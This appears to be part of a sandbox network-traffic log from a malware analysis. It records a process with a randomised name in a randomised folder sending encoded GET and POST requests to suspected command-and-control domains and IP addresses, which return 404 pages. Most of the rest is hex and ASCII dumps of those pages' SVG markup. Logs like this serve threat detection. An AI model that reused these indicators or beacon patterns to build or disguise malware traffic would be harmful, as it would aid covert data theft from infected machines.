Jan 11, 2025 09:36:08.723182917 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:36:08 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 11, 2025 09:36:08.723225117 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Jan 11, 2025 09:36:08.723246098 CET	1236	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jan 11, 2025 09:36:08.723295927 CET	1236	IN	Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Jan 11, 2025 09:36:08.723326921 CET	896	IN	Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32 Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
Jan 11, 2025 09:36:08.723360062 CET	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Jan 11, 2025 09:36:08.723375082 CET	1236	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
Jan 11, 2025 09:36:08.723391056 CET	448	IN	Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
Jan 11, 2025 09:36:08.723505974 CET	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
Jan 11, 2025 09:36:08.723531008 CET	1236	IN	Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
Jan 11, 2025 09:36:08.729931116 CET	1236	IN	Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49996	203.161.46.205	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:10.700490952 CET	546	OUT	GET /4pih/?40G=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLMq4/O2h+I/bDxqzy5zs+juv0ihYqY4w6XKkyY2pbw+VQr1Zt9gsO1Gc&I6=x8CX HTTP/1.1 Host: www.housew.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Jan 11, 2025 09:36:11.301606894 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:36:11 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 11, 2025 09:36:11.301639080 CET	1236	IN	Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
Jan 11, 2025 09:36:11.301666021 CET	448	IN	Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
Jan 11, 2025 09:36:11.301678896 CET	1236	IN	Data Raw: 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 Data Ascii: 01 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,
Jan 11, 2025 09:36:11.301692009 CET	1236	IN	Data Raw: 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 Data Ascii: 3,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91
Jan 11, 2025 09:36:11.301712036 CET	448	IN	Data Raw: 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e Data Ascii: 7,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,2
Jan 11, 2025 09:36:11.301723003 CET	1236	IN	Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
Jan 11, 2025 09:36:11.301789045 CET	1236	IN	Data Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
Jan 11, 2025 09:36:11.301826000 CET	448	IN	Data Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
Jan 11, 2025 09:36:11.302310944 CET	1236	IN	Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
Jan 11, 2025 09:36:11.306797028 CET	1236	IN	Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49997	101.32.205.61	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:16.960666895 CET	813	OUT	POST /lmj1/ HTTP/1.1 Host: www.nuy25c9t.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.nuy25c9t.sbs Referer: http://www.nuy25c9t.sbs/lmj1/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4b 63 6d 41 6a 74 55 6c 51 41 4c 48 48 30 59 46 6a 34 77 37 49 51 57 4a 50 57 39 58 38 67 57 30 59 42 62 6f 30 68 51 70 47 71 44 35 4d 45 4c 63 52 4a 64 49 6a 57 6f 79 44 4d 51 67 54 48 31 73 4f 62 6b 30 6b 57 72 59 66 67 47 52 51 78 62 6f 70 64 5a 4b 63 50 74 54 6d 54 6f 47 52 59 5a 51 65 49 63 4e 78 54 65 49 6f 48 35 7a 61 2f 5a 6f 6c 38 68 54 79 47 79 62 30 55 37 31 41 6c 49 5a 79 75 46 64 49 4b 55 72 49 6b 62 4e 55 32 44 43 62 79 44 71 6c 6a 6f 4a 73 68 4d 7a 4c 6d 52 52 38 4b 5a 70 33 36 67 4e 68 73 6b 35 5a 32 70 33 63 59 69 33 74 54 7a 4b 4c 39 4d 45 77 58 55 37 62 47 49 66 53 77 3d 3d Data Ascii: 40G=EwFRfd4q4ZNPKcmAjtUlQALHH0YFj4w7IQWJPW9X8gW0YBbo0hQpGqD5MELcRJdIjWoyDMQgTH1sObk0kWrYfgGRQxbopdZKcPtTmToGRYZQeIcNxTeIoH5za/Zol8hTyGyb0U71AlIZyuFdIKUrIkbNU2DCbyDqljoJshMzLmRR8KZp36gNhsk5Z2p3cYi3tTzKL9MEwXU7bGIfSw==
Jan 11, 2025 09:36:17.852766037 CET	708	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 08:36:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49998	101.32.205.61	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:19.518613100 CET	833	OUT	POST /lmj1/ HTTP/1.1 Host: www.nuy25c9t.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.nuy25c9t.sbs Referer: http://www.nuy25c9t.sbs/lmj1/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4d 39 57 41 77 37 63 6c 41 51 4c 41 65 45 59 46 74 59 77 2f 49 51 71 4a 50 58 35 48 38 7a 79 30 59 67 72 6f 31 67 51 70 42 71 44 35 43 6b 4c 46 65 70 64 50 6a 57 6b 41 44 4a 77 67 54 48 68 73 4f 62 55 30 6c 6c 7a 58 64 77 47 70 45 42 62 75 6e 39 5a 4b 63 50 74 54 6d 54 38 73 52 59 78 51 65 59 73 4e 7a 79 65 4c 67 6e 35 77 51 66 5a 6f 79 73 68 66 79 47 7a 2b 30 56 6e 54 41 6e 41 5a 79 72 68 64 4a 59 38 73 47 6b 62 44 51 32 43 54 51 68 32 46 39 54 6f 57 69 67 55 57 4f 55 6f 75 30 63 59 4c 74 59 73 68 2f 39 63 43 64 30 4e 42 4c 2b 2f 43 76 53 33 53 47 66 34 6c 76 67 78 52 57 55 70 62 45 45 50 6f 4e 4f 62 43 6f 63 73 35 56 35 4d 65 72 72 42 6b 67 45 45 3d Data Ascii: 40G=EwFRfd4q4ZNPM9WAw7clAQLAeEYFtYw/IQqJPX5H8zy0Ygro1gQpBqD5CkLFepdPjWkADJwgTHhsObU0llzXdwGpEBbun9ZKcPtTmT8sRYxQeYsNzyeLgn5wQfZoyshfyGz+0VnTAnAZyrhdJY8sGkbDQ2CTQh2F9ToWigUWOUou0cYLtYsh/9cCd0NBL+/CvS3SGf4lvgxRWUpbEEPoNObCocs5V5MerrBkgEE=
Jan 11, 2025 09:36:20.408497095 CET	708	IN	HTTP/1.1 404 Not Found Server: Tengine Date: Sat, 11 Jan 2025 08:36:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49999	101.32.205.61	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

